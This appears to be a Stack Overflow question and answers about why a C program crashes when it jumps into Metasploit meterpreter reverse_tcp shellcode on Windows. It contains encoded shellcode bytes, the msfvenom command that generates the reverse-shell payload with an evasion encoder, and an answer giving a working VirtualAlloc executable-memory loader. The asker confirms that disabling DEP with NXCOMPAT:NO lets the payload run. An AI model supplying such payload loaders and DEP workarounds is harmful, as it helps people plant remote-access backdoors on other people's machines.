2

I encounter a problem when I try to execute a shellcode in C, (a basic reverse_tcp, pointing to a local address).

I started from the basics with the following code:

#define WIN32_LEAN_AND_MEAN
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>

int main(int argc, char * argv[])
{
    /* Payload bytes held in an ordinary data buffer; the page that holds
       them is writable but not executable when DEP is in effect. */
    unsigned char shellcode[] = \
        "\xfd\xab\xd2\xa9\xb1\x29\xe0\xdd\x38\x64\x51\x24\x9d\x0f\xdf"
        "\x8a\xc2\x01\x0d\x2e\x6c\x9b\x86\xa9\x2e\x6f\xd9\xb3\x04\x4a"
        "\x35\x1c\x0a\xc6\xe7\x18\xf4\xaf\x3e\xed\x4b\x5c\x1a\x08\x8b"
        "\x71\x27\x5e\x20\xd1\x4d\xaf\x8f\x2d\x23\xe1\x68\x25\xf3\x19"
        "\xd2\x7b\x5e\xca\x26\x2a\xc7\xa0\x98\x64\x72\x7b\x03\x05\xf0"
        "\x46\x03\xdf\x19\x86\xfb\x04\xd0\x7d\xd9\xf8\xa0\xfb\x8c\xa0"
        "\x2d\xb2\xcb\x7f\xde\x7c\xc4\xd4\xe6\x94\xde\x56\x81\x53\xfc"
        "\x59\xe3\xfc\xb6\x7d\x50\x7e\xde\x6d\xf0\x8a\x33\x35\x99\xfc"
        "\x66\x0c\x45\xf0\xdc\xcb\x49\x4d\xa1\x2f\xd7\xaf\x59\xdc\xcf"
        "\x90\x8b\xd3\x7c\xb7\x7e\x6f\xa8\x15\xe4\x1d\xfd\xc2\xe7\x9d"
        "\x15\x88\x8b\xfb\x3b\x30\x1d\x41\xe6\x22\xdf\x3f\x4f\xb8\xe3"
        "\x65\x0d\xa8\xc1\x0a\x2d\xe9\x77\x7d\x84\x83\xa7\xfc\x29\x80"
        "\x72\xcd\xcc\x68\xa1\x08\x35\xda\xba\x01\xe2\xe5\x01\xe9\x05"
        ;

    /* Cast the buffer to a function pointer and jump into it. */
    int(*ret)() = (int(*)())shellcode;
    ret();

    return 1;
}

(I cut the shellcode for the example.) When I compile this .c file with Visual Studio Community 2017, I get a few warnings about argv and argc not being used, and about the conversion from () to (void) in ret.

Then I try to execute the file, and I get an awesome "has stopped working". So I launch the debugger in Visual Studio, and here is what I get:

[screenshot: debugger output]

So this is an access violation error, but why? I searched on Google, and it seems that this error can have many causes, but I can't figure out why it happens to me.

EinderJam

  • Is the shellcode designed for your platform?.... – LPs Jun 01 '17 at 07:49
  • The warning about `argv` and `argc` is useless. It is just telling you that you don't use them. You might as well write `int main(void)` – Badda Jun 01 '17 at 07:51
  • Tell us more about this shellcode. What is it? Where did you get it from? Do you have the source code? If yes, show it. The problem is in the shellcode. – Jabberwocky Jun 01 '17 at 08:00
  • You're trying to execute a chunk of code on the stack - most likely the stack pages are not marked as executable. Try it with Windows 95 or 98 - it should work there. – Paul R Jun 01 '17 at 08:06
  • Other suggestion: step through the assembly code with the debugger. – Jabberwocky Jun 01 '17 at 08:08
  • I generated the shellcode myself using this command on a fully updated Kali Linux 2017.1: msfvenom -p windows/meterpreter/reverse_tcp LHOST=my_ip LPORT=port -e x86/shikata_ga_nai -i 4 -f c (I guess the shellcode is correctly designed) – EinderJam Jun 01 '17 at 11:01
  • Mixing shell code designed for Linux and Windows is not going to work. – Jabberwocky Jun 01 '17 at 12:13
  • It isn't designed for Linux, metasploit generates the payload for Windows because the payload is windows/meterpreter/reverse_tcp. I could add "--platform windows", but it would be useless since metasploit detects the target platform from the payload itself. – EinderJam Jun 01 '17 at 13:34
  • You are probably running into DEP. – Govind Parmar Jun 01 '17 at 16:06

2 Answers

6

You normally can't execute code in the .data section of an executable on Windows. The access violation occurs because you're trying to run code that isn't executable.

https://msdn.microsoft.com/en-us/library/windows/desktop/aa366553(v=vs.85).aspx

Govind Parmar

  • You're right! Adding NXCOMPAT:NO to build arguments makes the file run fine! I'll now try to make my code DEP compatible! Thank you very much! – EinderJam Jun 01 '17 at 16:24
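The NXCOMPAT setting toggled in the comment above is recorded in the PE optional header's DllCharacteristics field. As an added example, not code from the question or either answer, this standalone C program parses that field and reports whether NX_COMPAT is set; the headers it inspects are constructed in memory rather than read from a real binary, and no windows.h is needed.

```c
/* Added example (not code from the question or answers): report whether a PE
 * image's DllCharacteristics has NX_COMPAT, the bit /NXCOMPAT sets and
 * /NXCOMPAT:NO clears. No windows.h needed; sample headers are constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define IMAGE_DLLCHARACTERISTICS_NX_COMPAT 0x0100
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }

/* 1 = NX_COMPAT set, 0 = clear, -1 = not a parsable PE. Layout: e_lfanew at 0x3c,
 * "PE\0\0", 20-byte COFF header, then the optional header whose
 * DllCharacteristics field is at +70 for both PE32 and PE32+. */
int pe_nx_compat(const uint8_t *img, size_t len) {
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z') return -1;
    uint32_t pe = rd32(img + 0x3c);
    if (pe > len || len - pe < 4 + 20 + 72) return -1;
    if (memcmp(img + pe, "PE\0\0", 4) != 0) return -1;
    const uint8_t *opt = img + pe + 24;
    uint16_t magic = rd16(opt);
    if (magic != 0x10b && magic != 0x20b) return -1;      /* PE32 / PE32+ */
    return (rd16(opt + 70) & IMAGE_DLLCHARACTERISTICS_NX_COMPAT) ? 1 : 0;
}

/* Build a constructed, minimal PE32 header (not a real binary) with the given
 * DllCharacteristics and return pe_nx_compat's verdict on it. */
int sample_verdict(uint16_t dllchar) {
    uint8_t buf[512];
    const uint32_t pe_off = 0x80;
    size_t need = pe_off + 4 + 20 + 224;   /* PE32 optional header is 224 bytes */
    memset(buf, 0, need);
    buf[0] = 'M'; buf[1] = 'Z';
    buf[0x3c] = (uint8_t)pe_off;
    memcpy(buf + pe_off, "PE\0\0", 4);
    uint8_t *coff = buf + pe_off + 4;
    coff[0] = 0x4c; coff[1] = 0x01; coff[16] = 224;  /* Machine = i386, SizeOfOptionalHeader */
    uint8_t *opt = coff + 20;
    opt[0] = 0x0b; opt[1] = 0x01;          /* Magic = PE32 */
    opt[70] = (uint8_t)dllchar; opt[71] = (uint8_t)(dllchar >> 8);
    return pe_nx_compat(buf, need);
}

int main(void) {
    printf("/NXCOMPAT    -> %d\n", sample_verdict(0x8140)); /* NX_COMPAT|DYNAMIC_BASE|TS_AWARE: 1 */
    printf("/NXCOMPAT:NO -> %d\n", sample_verdict(0x8040)); /* same flags minus NX_COMPAT: 0 */
    return 0;
}
```

Pointing pe_nx_compat at the bytes of a built executable (read the whole file into a buffer) gives the same check against a real image.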
1

This is because the .data section in a PE is allocated without execute permission. Try this, and disable DEP in the linker settings if it is set:

#include <Windows.h>
#include <string.h>
#include <stdio.h>

int main()
{
    const char shellcode[] = ".......";   /* payload bytes elided by the answer's author */
    /* Request a page that is explicitly executable instead of reusing data or stack memory. */
    void *exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        fprintf(stderr, "VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    memcpy(exec, shellcode, sizeof(shellcode));
    ((void(*)())exec)();
    return 0;
}
dgrandm